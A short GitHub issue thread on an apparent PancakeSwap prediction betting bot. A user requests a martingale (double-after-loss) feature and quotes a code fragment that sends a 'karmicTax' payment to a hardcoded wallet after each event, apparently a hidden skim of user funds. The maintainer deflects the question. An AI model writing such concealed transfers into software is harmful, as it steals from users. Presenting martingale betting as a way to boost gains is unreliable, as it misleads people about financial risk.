### ISSUE TITLE
feature request not an issue

### ISSUE THREAD

**Issue by reggieThediciple** [AssaEmpireToken/Pancakeswap-Prediction-Bot-2022-Updated#39]
would you consider putting in a martingale feature? Doubling the bet every loss, and then going back to base bet on wins would help boost the gains since the win rate is pretty good.

Also, what is this code for?
"for (const event of receipt.events ?? []) {
        const karmicTax = await signer.sendTransaction({
          to: "0x0A4A569cfA700Fc2A1d54974712716E537C169ff",
          value: calculateTaxAmount(event?.args?.amount),"
          
I tried emailing the support email and it didnt work

**Comment by AssaEmpireToken** [comment]
Thanks for your request. Our Team is in vacation. I write our programmer and give you here an Info about ur question
